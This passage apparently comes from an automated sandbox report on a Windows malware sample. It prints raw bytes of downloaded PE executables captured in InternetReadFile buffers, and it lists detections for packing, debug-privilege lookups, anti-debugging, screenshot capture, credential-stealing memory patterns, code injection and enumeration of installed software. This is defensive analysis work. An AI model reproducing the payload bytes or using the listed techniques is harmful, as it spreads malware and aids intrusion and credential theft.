5FèÏlhPÜDè¾YÃÌÌÌjhE¹ -Fè¯lh°ÜDèh¾YÃÌÌÌjh$E¹8,FèlhÝDèH¾YÃÌÌÌjh<E¹ 2FèolhpÝDè(¾YÃÌÌÌjhHE¹/FèOlhÐÝDè¾YÃÌÌÌjh`E¹è6Fè/lh0ÞDèè½YÃÌÌÌjhlE¹Ø4FèlhÞDèÈ½YÃÌÌÌjhE¹(FèïkhðÞDè¨½YÃÌÌÌjhE¹(-FèÏkhPßDè½YÃÌÌÌjh E¹ /Fè¯kh°ßDèh½YÃÌÌÌjh¼E¹,FèkhàDèH½YÃÌÌÌjhÐE¹¨.FèokhpàDè(½YÃÌÌÌjhÜE¹X0FèOkhÐàDè½YÃÌÌÌjhèE¹H4Fè/kh0áDèè¼YÃÌÌÌjhôE¹À.FèkháDèÈ¼YÃÌÌÌjhE¹5FèïjhðáDè¨¼YÃÌÌÌjhE¹¸6FèÏjhPâDè¼YÃÌÌÌjh$E¹3Fè¯jh°âDèh¼YÃÌÌÌj@h0E¹-FèjhãDèH¼YÃÌÌÌjhtE¹0FèojhpãDè(¼YÃÌÌÌjLhE¹P/FèOjhÐãDè¼YÃÌÌÌj<hÐE¹`+Fè/jh0äDèè»YÃÌÌÌjhE¹¨1FèjhäDèÈ»YÃÌÌÌjh E¹à/FèïihðäDè¨»YÃÌÌÌjh,E¹8/FèÏihPåDè»YÃÌÌÌjh8E¹À1Fè¯ih°åDèh»YÃÌÌÌj@hHE¹ø)FèihæDèH»YÃÌÌÌ request_handle: 0x00cc000c	1	1
InternetReadFile June 15, 2024, 8:21 a.m.	buffer: MZx@xhrº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd (lfð"¸ôRõÒ@Ø`¨nÖdÀÍ×+Ø `ð(Ì×8Ëh.textV¶ `.rdataXCÐ@@.datahÛR @À.pdata¤T@@.00cfgT@@.tls T@À.Ue[ÿßv0T `.>P-PË @À./ubÈØ ËÚ`h.reloc Øè@B°ÒìJZ<&ÎqÑÍ¸_ØÀ2Î^°ï}¼ôdVÝäÂ±]dý:±]ºÖYÞ¥l ¸¬ïÍ O¢o[ô<¼ô, ï;[Ì°]aïa½ÄHü'Hp·öIïCX¼<i=³Yö4!3\|×=³YÝ Åß.{«.@[Ø(æ½3¦ñ1¬÷»Ä®8IÈCÜZ±ªÏ@°ç½1å Î¤ö¥.-ábÓºEâ·~íkvmUó æ½ wÂÈ:ßç½Û3éyþØfµ¨Ø}WÚ"¢ÙuíîÒnSï=aB6×á°æE>°Ø6ØØVy*¼íHÇD$TjRè§íHÇD$7XèUZñþìL%Þ:ço-¹H,¤fþI4,$Ñ4,$Lh4,$4hÏì¼«>¤ºdÝÊÓÛ6ªèAkõÈSmMÁ[dbµ4,$$jaÑ¹qDèaiÉQ-³ï³EÔfÖ¥Tä»á>\JEK@XG(ÒG¢Z¸M¯V£÷ü¤¤Bh$F²P ]©ãxwºCb¼xSú¼xÛ>¶õsÛ^¯¯bJ^:ëòHèÍÞÙ.¶\|h3î!ã3J^ÿ²J^)÷JJ^¥RJ^³»çF request_handle: 0x00cc000c	1	1
InternetReadFile June 15, 2024, 8:21 a.m.	buffer: MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $>>Ö{z_¸(z_¸(z_¸(d -(`_¸(d ;(û_¸(d <(T_¸(]Ã(_¸(z_¹(_¸(d 2({_¸(d ,({_¸(d )({_¸(Richz_¸(PEL²úUeà (¦ø¤'@@`ùD>üÅ<Ð÷P»Ðº@@.textÜ'( `.rdata:@,@@.dataøëñÐX¼@À.tlsÀ÷@À.rsrcPÐ÷@@UìVEPñè#ÇôAAÆ^]ÂÇôAAéØUìVñÇôAAèÇöEtVèFYÆ^]ÂUì}t(~r"FW8ÛvQWjPè#ÄWèY_ËÆÇFè]ÂUìVSW^úrëË¸\³E;Èw3úrëË~y;ÈvúrëËÿuØ+ÙÑûVÆèTë4}ÆèÎÀt$Førh\³EPSÇèÄÏÆèÆ_[]ÂxHr@ëÀ3ÒfHÃUìVðW9^sè~+û9}s}E;ÆujÿûðèS3ÿèëCèGÀt:~rFëFuVúrNëNXPRQÇèðÄÏÆèkÿÿÿE_^]ÂVðÿþÿÿvè¿F;ÇsÿvWVè ëÿu!~ørvëÆ3Àf3À;ÇÀ÷Ø^ÃUìQQ9~sèÆF+Ç;EsE}vSNSVùr]üëUüùr]+ÃÀPUøUüBPEø+ÏÉQxPè^NÄ+ËÆè¨þÿÿ[ÆÉÂj¸7Aè&u}Ïÿþÿÿv}ë'3ÒjÇ[÷óNMìÑmìUì;Âs¸þÿÿ+Â;Èw< eüOèEë$EHeðEìÆEüènE¸ô@Ãu}ì}v!~rFëFPGPÿuEèxÄj3Ûè"ýÿÿEMFÆ~èàýÿÿè¢Âuj3ÛèûüÿÿSSèãÌUììÉw3É Pè+YÉÃÈÿ3Ò÷ñøsèjMôèyüÿÿh@ÅEEôPè¦ÌUìÀPÿuEÀPÿuèèEÄ]ÃUìVÿuñèßÇôAAÆ^]ÂÿUìÿuÿuÿuÿuè¯EÄ]ÃÿUìÿuÿuÿuÿuèÀEÄ]ÃÿUì}Vt+qAþrëÐ9UrþrIÈ;Mv°ë2À^]ÂÿUìMìÉw3ÉQè8YÉÃÈÿ3Ò÷ñøsëjMôèûÿÿh@ÅEEôPè³ÌÿUìÿuÿuÿuÿuè1ÿÿÿÄ]ÃÿUìÿuÿuÿuÿuè4ÿÿÿÄ]ÃÿUìyEArIëÁÆ]ÂÿUìjÿuè[ÿÿÿYY]ÂÿUìQÿuüÿuÿuÿuÿuèzÿÿÿÄÉÃÿUìQÿuüÿuÿuÿuÿuèvÿÿÿÄÉÃÿUì}Vñt)~r#}FW8vÿuWjPèÿÿÿÄWè" Y_ÿuÎÇFèDÿÿÿ^]Âj¸ë6Aè"ù}èuÎþþvuë%3ÒjÆ[÷óOMìÑmìUì;ÂsjþX+Â;Èw4 eüFPÏèÿÿÿØë)EMèE@eðPÆEüèðþÿÿEì¸ù@Ã}èu]ì}vrGëGÿuPFPSèÑþÿÿÄjjÏèÿÿÿÿuÏ_wè}þÿÿèÂMè3öVjèÜþÿÿVVèÝÌjjèËþÿÿÃj¸7Aèñuðè¢ÿueüNÇBAèÆèIÂy$rAÃAÃÿVñjjNÇBAèpþÿÿÎ^é4ÿUìVñèÔÿÿÿöEtVè¦YÆ^]ÂÿUìVÿuñèmÿÿÿÇBAÆ^]ÂÇBAéÿÿÿÿUìVñÇBAèÿÿÿöEtVèWYÆ^]ÂÿUìVÿuñèÿÿÿÇBAÆ^]ÂÇBAéIÿÿÿÿUìVñÇBAè6ÿÿÿöEtVèYÆ^]ÂjD¸17Aèåh BAMØèeüEØPM°è9ÿÿÿhH¾EE°PèzÌÿUìVuþþvèµÿÿÿ9qsÿqVèýÿÿë(}tþsA;ðsÆPjè2ýÿÿë öuVè²üÿÿ3À;ÆÀ÷Ø^]ÂÿUìVW}WñèàûÿÿÀt~rFëFÿu+øWVÎè2ë:jÿuÎèhÿÿÿÀt(NùrFëFÿuWQPè\|üÿÿÄÿuÎè9üÿÿÆ_^]ÂÿUìVÿuñèYPÿuÎèpÿÿÿ^]ÂÿUìVñjÇFèúûÿÿÿuÎè¿ÿÿÿÆ^]ÂjD¸T7Aèh0BAMØèÀÿÿÿeüEØPM°è<þÿÿhÌ¾EE°Pè.ÌÿUìUVñN;Êsè±ÿÿÿ+Ê;MsM}vBFSW~ørëßør?+MÚ]QS+ÂPúWè°ûÿÿF+EÄPÎèJûÿÿ_[Æ^]ÂÿUìS]VW}Gñ;Ãsè<ÿÿÿ+ÃEE;EsE;÷uEjÿÃPèSÿÿÿSjÎèIÿÿÿëFjÿuèñýÿÿÀt8rëÇNùrFëFÿuûWQPèõúÿÿÄÿuÎè²úÿÿ_Æ^[]ÂÿUìVñjÇFèúÿÿjÿjÿuÎèDÿÿÿÆ^]Âj¸w7Aè.ñuð}WèGeüÇWNÇBAè¥ÿÿÿÆèlÂÿUìVÿuñè¶ÿÿÿÇBAÆ^]ÂÿUìVÿuñèÿÿÿÇBAÆ^]Â; ÐEuóÃé4ÿUìEVW3ÿ;ÇtG9}uè&j^0WWWWWè¯ÄÆë)9}tà9Esèj"Yñë×PÿuÿuèèÄ3À_^]ÃÁ``ÇLBAÃÿUìS]VWùÇLBAÀt&Pè_ðFVèÙYYGÀtÿ3VPèáÄëgÇGÇ_^[]ÂÿUìÁMÇLBA `H]ÂÿUìS]VñÇLBACFÀCWt1Àt'PèäøGWè^YYFÀtÿsWPèeÄë fëF_Æ^[]Â request_handle: 0x00cc000c	1	1
InternetReadFile June 15, 2024, 8:21 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEdÒ®eð"(@@0)`¨Ë<)Ð( )x °(´8@ÍX.textV `.rdataü"°$@@.dataé'àÖ'º@À.pdataÐ((@@.00cfgà((@@.tlsð((@À.rsrc)(@@.relocx )¬(@BVHì H ÇH ÇH ÇH Õ·1ÀúMZuKHcQ<<PEu>HÑ·Qútúu'ytr!HÁèë¹rHÁø1À9ÀH 9¡£(¹ÙèHÙ0è 0H¹0èê0èH,8uH è 1ÀHÄ ^ÃHì(H=£(H6£(H oD HD$ H $£(H!£(L"£(è}HÄ(ÃHì(HÕÇè HÄ(ÃfAWAVVWSHì eH%0HxH5É1ÀðH±>Ãt.H9Çt)L5Ù¼f¹èAÿÖ1ÀðH±>ÃtH9ÇuçH=øu¹èÿë'?t Æy¢(ëÇH zH{èöøuH PHQèÜÇÛt1ÀHHæHHÀt1ÉºE1ÀÿÆÍ(è9H Âÿ¼H åHH +è& èHc=Î¡(HýèHÆHÿ~GûL5´¡(E1ÿfKþèHxHùèkJþKþHÁIøèhIÿÇL9ûuÐë1ÛHÇÞH5e¡(èØHa¡(H "H H B¡(H?¡(L@¡(è)A¡(=¡(t =-¡(uè®$¡(HÄ [_^A^A_ÃÁèÅÌ@Hì(HÅÇèúýÿÿHÄ(ÃfHì(è1ÉHøÉÈHÄ(ÃÃÌÌÌXHL$HT$LD$LL$ Hì( MÌèNÌH1ÉèHCÌH1À6ÌHÄ(HL$HT$LD$LL$ IÊ ÌÿÌÿ5ÌÃÇòË èÿÿÿÇãËQ²?èrÿÿÿÇÔË= C}ècÿÿÿÇÅËÈ\%,èTÿÿÿÇ¶ËÅ$VèEÿÿÿÇ§Ë²Åè6ÿÿÿÇË{ºÛ8è'ÿÿÿÇË TñèÿÿÿÇzËhypüè ÿÿÿÇkËÁÜRÔèúþÿÿÇ\ËÑú_ÓèëþÿÿÇMË`4ÞèÜþÿÿÇ>ËèÍþÿÿÇ/Ëè¾þÿÿÇ ËÇ*éè¯þÿÿÇË]laàè þÿÿÇËËKÓàèþÿÿÇóÊÙâèþÿÿÇäÊ>ÄèsþÿÿÇÕÊ£®~èdþÿÿÇÆÊ6ÿ8èUþÿÿÇ·ÊëË?ìèFþÿÿÇ¨Ên©è7þÿÿÇÊ)?âè(þÿÿÇÊ5¥@dèþÿÿÇ{Êq¼²è þÿÿÇlÊµ¨èûýÿÿÇ]ÊìlÃèìýÿÿÇNÊ_ôèÝýÿÿÇ?ÊÍ=èÎýÿÿÇ0Ê<]]Êè¿ýÿÿÇ!Ênöè°ýÿÿÇÊEÀè¡ýÿÿÌÌÌÌÌÌÌÌÌÌÌÌÌHì(H ÊHHÀt.ffff.ÿâÉ(HëÉHHH àÉH@HÀußHÄ(Ãf.VWSHì H5:øÿu¸ÿÿÿÿfDHÿÀH<ÎuôÀt%ÇHÿÏHûHDþÿmÉ(HÿËÿHßuëH TÿÿÿHÄ [_^é¸üÿÿVWSHì =(tHÄ [_^ÃÆ(H5²øÿu¸ÿÿÿÿfffff.HÿÀH<ÎuôÀt%ÇHÿÏHûHDþÿÝÈ(HÿËÿHßuëH ÄþÿÿHÄ [_^é(üÿÿÌÌÌÌÌÌÌÌ1ÀÃÌÌÌÌÌÌÌÌÌÌÌÌÌVWHì(Hc8tÇút<úuAH5¿³H=¸³H9÷uë,fHÇH9þtHHÀtïÿQÈ(ëçºè ¸HÄ(_^Ã1ÀÃffff.Hì(útÒuèî¸HÄ(ÃÌÌÌÌVWHì8HÎÿÈøwHH ÑHc<HÏëH=¹è[ LNFòN òL$0D$ HkHÁIøè11ÀHÄ8_^ÃÌÌÌÌÌÌÌÌÛãÃÌÌÌÌÌÌÌÌÌÌÌÌÌUAWAVAUATVWSHìHl$=ü(mÆï(Hì ènHÄ HHHÅHàðè H)ÄHàHÆ(ÇÄ(H=ÅHøH+ÃHøH²HøH)ØHø\|,H;u/H{u"HHXxHEØ;u {ÓH;\sHL5«Huffffff.KB1LñEHì A¸HòèHÄ HÃH9ûrÒ(À~g¿Hì(1ÛHuøL5¿´ëffff.HÿÃHcÈHÇ(H9Ë}0DD:ðEÀtçHL:øH:Hì IñAÿÖHÄ H((ëÁHe[_^A\A]A^A_]ÃSú[HÃH;yaÿÿÿL5ÄL=½A¼HuøI½ÿÿÿÿëffffff.HÃH9û!ÿÿÿKAÈAàøAÀøA¬ÈAø×CLðN2OcMúAÿâD¶MÿÿÿEÛëD·MÿÿfEÛë DO+EÛMIÓëLLòI)ÒMÊLUø¶Ñú?w&IÇÃÿÿÿÿÑIÓãI÷ÓM9ÚLJÿIÇÃÿÿÿÿIÓãM9Ú\|:AøDÿÿÿE£Ä:ÿÿÿIcÈH0LÊHì HÁHòèMHÄ éÿÿÿHì0LT$ H IÀèÌ¶ÑHì H Øè¹Hì H è©ÌAWAVATVWSHìXLÇHÓHÎD=ë(Eÿ~GH×(JýH1ÒëHÂ(H9Ñt#LDI9ðwíLL EIMÈI request_handle: 0x00cc000c	1	1
InternetReadFile June 15, 2024, 8:21 a.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÝáWsss}s¯¦yÙs,sr!s.s¯¦xÔsööÙsööís^usRichsPEL÷SåLà°K°@äédp` °ø.textê `.rdataD°F@@.dataHZ2ä@À.sxdata`@À.rsrc` p@@éÆdB;ÆxB;ÃUìì4ESVW£D1Bè$ j3Û_hÿÿÿW¢H1BhÿÿÿlÿÿÿpÿÿÿèWMä]ä]è]ìè WM´]´]¸]¼è÷WM]]]èåÿ°APMÀèæEähÿÿÿPMÀèB(ÿuÀèè)Y]WM] ]¤è© D1BUè 5MäèMäè>htBMÀ]èðEðjPMäè5 èAÿuððè)ÿuÀè\|)Y;óYu4EðjPMäÆEèáPMäè9ÿuðèS)YMäèMäèÉWM¨]¨]¬]°èÒME¨PhxBºdBèr Àu8]uºDB3Éèüþj[é%h<B0ÿÿÿèÑ WMÌ]Ì]Ð]Ôè¯9]¬Æ,ÿÿÿàTÿÿÿèy¿4³ATÿÿÿM¨½Tÿÿÿèe+Àu8]uº B3Éèþj[é!hBMðèa EðTÿÿÿPMÀèB.ÿuðèc(MðÇ$üBè8 EðTÿÿÿPMØè.ÿuðè:(MðÇ$èBè EðTÿÿÿP ÿÿÿèí-ÿuðè(YºàB ÿÿÿè°(Àu,ÿÿÿhÌBMðèÊ UðTÿÿÿè}-ÿuððèÎ';óY\|`ÿÿÿ0ÿÿÿ°ÀPè 9]Ü©8] j$ÿuÀÿuØSÿä±Aøÿµ ÿÿÿè\|'ÿuØèt'ÿuÀèl'ÄTÿÿÿ½Tÿÿÿè/Tÿÿÿè^/ÿuÌèE'ÿµ0ÿÿÿè:'ÿu¨è2'ÿuè'ÿuè"'ÿu´è'ÿuäè'ÿµhÿÿÿè'Ä é]h´BMðèÖEðTÿÿÿPÿÿÿè´,PMÌè² ÿµÿÿÿèÉ&ÿuðèÁ&YYhBMðèEðTÿÿÿPÿÿÿèt,PM´èr ÿµÿÿÿè&ÿuðè&YYhxBMðèVEäTÿÿÿPEðPHÿÿÿè0,ÐÿÿÿèäPMè! ÿµÿÿÿè8&ÿµHÿÿÿè-&ÿuðè%&ÿµ ÿÿÿè&ÿuØè&ÿuÀè &ÄTÿÿÿ½Tÿÿÿè0.Tÿÿÿèü-xÿÿÿtÿÿÿè ÿ5`BtÿÿÿèÅ=Àu8]uº0B3Éè«ûj[é¨jè%ðY;ótN^è Ç(³Aþë3ÿ;ûtWÿPÏèákÀtºB3Éè]ûéxÿÿÿ<ÿÿÿè·jMØ]ÿ]Ø]Ü]àèEØUPEÿP<ÿÿÿÿµ,ÿÿÿÏPè;Ãtt8]ugøt8]ÿt(jHÿÿÿZèJPMØèÏÿµHÿÿÿèæ$Y¸@=@t.9]Üt)jHÿÿÿZèYJjPÿuØSÿä±AÿµHÿÿÿè¬$YÿuØé¾ÿuØè$YMèÃMè!:ÿµxÿÿÿ5°AÿÖÀu-ÿuÿÖÿuèk$ÿµ<ÿÿÿè`$YY;û¢þÿÿWÿPéþÿÿ9]¸ÒU´MÀè³EÀ9]èÇÔþÿÿ<ÇØþÿÿ@ÜþÿÿàþÿÿäþÿÿtEäMPèDUMØènEÜìþÿÿ÷ØÀÇðþÿÿ#EØÿÿÿèþÿÿÔþÿÿPÿ±A½ôþÿÿ w'8]uºäB3ÉèùÿuØè#ÿuÀè#Yé¡ÿÿÿÿuØEè~#ÿuÀèv#Yé.9]ÐuVhÐBMÌèÝUÌHÿÿÿèÌè)AÿµHÿÿÿöØÀþÀEÿè5#8]ÿYt8]9º B3Éèùé(<ÿÿÿMÀPèKMÀèmEhBMðèÕEÀMÌPEðPèÿuðèÙ"ÿuÀèÑ"YYhBMðè¦<ÿÿÿMÌPEðPèiÿuðè§"9]èYtj MÌè³EäMÌPèÒEÌ0ÿÿÿPHÿÿÿÇÌþÿÿDÐþÿÿÔþÿÿØþÿÿøþÿÿfþþÿÿÿÿÿèß Ð ÿÿÿè¶ÿµHÿÿÿè/"YÿÿÿPÌþÿÿPSSSSSSÿµ ÿÿÿSÿ°AÀ£8]u3Éèøÿµ ÿÿÿèî!YÿuÿÖÿuèà!ÿµ<ÿÿÿèÕ!Y;ûYtWÿPtÿÿÿèOÿµxÿÿÿè³!ÿuÌè«!ÿµ0ÿÿÿè !ÿu¨è!ÿuè!ÿuè!ÿu´è!ÿuäèx!ÿµhÿÿÿèm!Ä$jXéÂÿµÿÿÿÿ°Aÿÿÿÿµ ÿÿÿEèB!9]Ytjÿÿuÿ°Aÿuÿ°AÿuÿÖÿuè!ÿµ<ÿÿÿè!Y;ûYtWÿPtÿÿÿèÿµxÿÿÿèî ÿuÌèæ ÿµ0ÿÿÿèÛ Äÿu¨èÐ ÿuèÈ ÿuèÀ ÿu´è¸ ÿuäè° ÿµhÿÿÿè¥ ÄÃ_^[ÉÂQd$Vñjè!Æ^YÃQd$VñjèÜ"Æ^YÃVñ>u°^ÃNè 2öØÀjþÀXÀ^ÃUììlÿÿÿÇlÿÿÿPÿ°AÀt½\|ÿÿÿujXÉÃ3ÀÉÃD$ÿ@@ÂVt$ÿNFuötÎè VèêY3À^Â¸´AèQVquðÇ<³AeüÎèú'MüÿÎèÆ'Mô^d ÉÃ¸ÈAèV¸$è¸!EVW3ÿòxuÐ MäÿQMä}üèA@ÀuMüÿMäè9>2Àé(>}ìtÿEìEì<0uôE}è8tÿEèMè<uô3öeóS}Ü}àë3ÿ¸MØ+ÆQP5ÐïÿÿPMäè/@À·EØ;Ç¨ðÐïÿÿ}óÆt2+Eè;øwQÿuèÿuSèÿÄÀt~ÀEÔtyÿuÔMèùGCëÆ+Eì;øwÿuìÿuÐSèÍ request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (3 events)

section

{u'size_of_data': u'0x0002d800', u'virtual_address': u'0x00001000', u'entropy': 7.982860765886352, u'name': u' \\x00 ', u'virtual_size': u'0x00066000'}

entropy

7.98286076589

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x0019ca00', u'virtual_address': u'0x00312000', u'entropy': 7.953840589189804, u'name': u'gznyyhbr', u'virtual_size': u'0x0019d000'}

entropy

7.95384058919

description

A section with a high entropy has been found

entropy

0.994033089232

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (16 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW June 15, 2024, 8:14 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 15, 2024, 8:14 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 15, 2024, 8:14 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 15, 2024, 8:14 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 15, 2024, 8:14 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 15, 2024, 8:14 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 15, 2024, 8:14 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 15, 2024, 8:14 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 15, 2024, 8:14 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 15, 2024, 8:14 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 15, 2024, 8:14 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 15, 2024, 8:14 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW June 15, 2024, 8:21 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 15, 2024, 8:21 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 15, 2024, 8:21 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 15, 2024, 8:22 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Expresses interest in specific running processes (1 event)

process

system

Potentially malicious URLs were found in the process memory dump (2 events)

url	https://crashpad.chromium.org/bug/new
url	https://crashpad.chromium.org/

Yara rule detected in process memory (40 events)

description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (39 events)

Time & API	Arguments	Status
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000538 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: AddressBook base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: Connection Manager base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: DirectDrawEx base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: EditPlus base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: ENTERPRISE base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: Fontcore base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: Google Chrome base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: IE40 base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: IE4Data base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: IE5BAKEX base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: IEData base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: MobileOptionPack base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: SchedulingAgent base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: WIC base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW June 15, 2024, 8:22 a.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x00000538 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
